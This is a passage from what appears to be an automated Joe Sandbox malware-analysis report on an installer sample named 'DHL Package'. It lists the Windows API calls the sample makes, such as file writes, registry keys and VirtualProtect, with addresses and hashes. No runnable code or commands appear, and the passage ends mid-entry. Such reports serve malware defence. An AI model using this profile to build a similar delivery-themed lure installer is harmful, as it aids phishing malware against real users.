                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1375471231-0
                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                • Instruction ID: b8aeb4fbbaa0c149d17919ad16f2792b2b84c079cfd5907120def0498e2ab647
                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                • Instruction Fuzzy Hash: 6DC04CB1244501EED6105B209F08B1B7A90EB50791F1688396146E01A0DA3C8455D97E
                                                                                                APIs
                                                                                                • CreateFileA.KERNELBASE(00000000), ref: 6CA72BB7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 8adaffbea89704e89bd707a7c95601ee8f7e8a7ab4729aa90d1b04ad3caaa43a
                                                                                                • Instruction ID: f890349a1dfcb3efb840647016c96c32756adb4b816a15a4623e1d732002cff6
                                                                                                • Opcode Fuzzy Hash: 8adaffbea89704e89bd707a7c95601ee8f7e8a7ab4729aa90d1b04ad3caaa43a
                                                                                                • Instruction Fuzzy Hash: 3E416D7DA0031ADFDF359F64DA8CB993778FB46318F248629E405C6A10D73495CA8AB1
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028A7
                                                                                                  • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointerwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 327478801-0
                                                                                                • Opcode ID: 2bf7c67bec83a18c92f8349ffc07d252c0eb32d1864c4eeb5a603f0f7a51f385
                                                                                                • Instruction ID: cf1c11e2e5d3b8127a02fd369e9b9480f26c54c3f48694b4fc9876f358321d4b
                                                                                                • Opcode Fuzzy Hash: 2bf7c67bec83a18c92f8349ffc07d252c0eb32d1864c4eeb5a603f0f7a51f385
                                                                                                • Instruction Fuzzy Hash: D9E0ED71A14104ABDB01EFA5AE498BFB7B9EB54318B20443BF512B10D1C6B95D119A3A
                                                                                                APIs
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                • String ID:
                                                                                                • API String ID: 390214022-0
                                                                                                • Opcode ID: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                                                                • Instruction ID: 2036f094aef4cf8fcdd3ce51ebd23e93268b82f075a1b79732874c3119e34eec
                                                                                                • Opcode Fuzzy Hash: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                                                                                                • Instruction Fuzzy Hash: 30E086319001246ADB303AF15E8DEBF21586F44345B14093FFA12B62C2DAFC0C42467D
                                                                                                APIs
                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 0040629F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                • Instruction ID: 5e8c37c3a871b4686c003d5622fbd1f004467430ef2d1147db4d8909a4c30713
                                                                                                • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                • Instruction Fuzzy Hash: 6EE0E67201010DBFEF095F50EC0AE7B371DEB04310F01452EF916E4051E6B5A9309634
                                                                                                APIs
                                                                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: PathSearch
                                                                                                • String ID:
                                                                                                • API String ID: 2203818243-0
                                                                                                • Opcode ID: 1b0d49dd72dabc9e76704ceb669f754e98eb55e79acd6c4ba17716b2a4a9ff70
                                                                                                • Instruction ID: 92f478ab202d62e1837fe9de49df27786daa87776153eb38916ae48360e4a3b1
                                                                                                • Opcode Fuzzy Hash: 1b0d49dd72dabc9e76704ceb669f754e98eb55e79acd6c4ba17716b2a4a9ff70
                                                                                                • Instruction Fuzzy Hash: A9E0D872300100EBD700DFA4DD48EAB3368EF50318B304136E611A50C0D2B459019329
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403444,00000000,00000000,0040329B,?,00000004,00000000,00000000,00000000), ref: 00405F68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                • Instruction ID: 9c26e1e14bdaa641b2cd1607f69676223ac96f38baf9ffa7ddee8aaf7cdc77b6
                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                • Instruction Fuzzy Hash: 0DE0EC3221025EABDF10AEA59C04EEB7B6CEB053A0F004877FD25E7150D735E9219BA8
                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,00403412,000000FF,00414EC0,00000000,00414EC0,00000000,?,00000004,00000000), ref: 00405F97
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3934441357-0
                                                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                • Instruction ID: e9dec13cd64576ed05e9c77268ddc280887ed2a39adbcd5729fa6c11973cde1c
                                                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                • Instruction Fuzzy Hash: B8E0EC7221065AABDF109E659C00BEB7B6CEB05360F004476FE65E3150E639E9219BA5
                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(6CA7505C,00000004,00000040,6CA7504C), ref: 6CA729FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: f18df181dc71c0ab842e7a29f1553a0adcf7e22881be5d668305402f08729b6e
                                                                                                • Instruction ID: a3c0dd1bfb31e55bb339085626a94d26549c2173d14e027afc5f8fe5051d5af1
                                                                                                • Opcode Fuzzy Hash: f18df181dc71c0ab842e7a29f1553a0adcf7e22881be5d668305402f08729b6e
                                                                                                • Instruction Fuzzy Hash: 2BF0ACB87043A2DEDB6ACF28844CB053BF0B70B304B15C53AE14AD6640E3344047CBB1
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062D6,?,00000000,?,?,Call,?), ref: 0040626C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                • Instruction ID: bea724714cad9c1dc166f779914bff17c7130a41f5efdae6cf1778ebc3f0871c
                                                                                                • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                • Instruction Fuzzy Hash: AFD0123210020DFBDF116FA0ED01FAB772DAB08350F014426FE06A40A1D775D530A768
                                                                                                APIs
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: b94bd691ebf15dc608dfd6f8c15b532d0673ac7a6ed34f3d4a9c9e7cf74e8c06
                                                                                                • Instruction ID: d0c8bdfabdae3c8c8ee7f1a942bb5adfb9f4894ad1ff7db24bb333cf26e5fd72
                                                                                                • Opcode Fuzzy Hash: b94bd691ebf15dc608dfd6f8c15b532d0673ac7a6ed34f3d4a9c9e7cf74e8c06
                                                                                                • Instruction Fuzzy Hash: D2D01772B04104DBCB00DFA9AA48A9E73B1EF24328B308537D521F21D0D6B989519A2A
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                • Instruction ID: 6a5b654620e47c205ef353ff56fd69433b0ebd381e98485a923522fb35466dbd
                                                                                                • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                • Instruction Fuzzy Hash: A8C09BB1740705BBEE218F519D4DF1777586750700F294479B755F60D0D674D850D61C
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403455
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                                                                • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,0040412A), ref: 0040435D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                                                                • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                                                                APIs
                                                                                                  • Part of subcall function 00405443: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                  • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                  • Part of subcall function 00405443: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00403385), ref: 0040549E
                                                                                                  • Part of subcall function 00405443: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004054B0
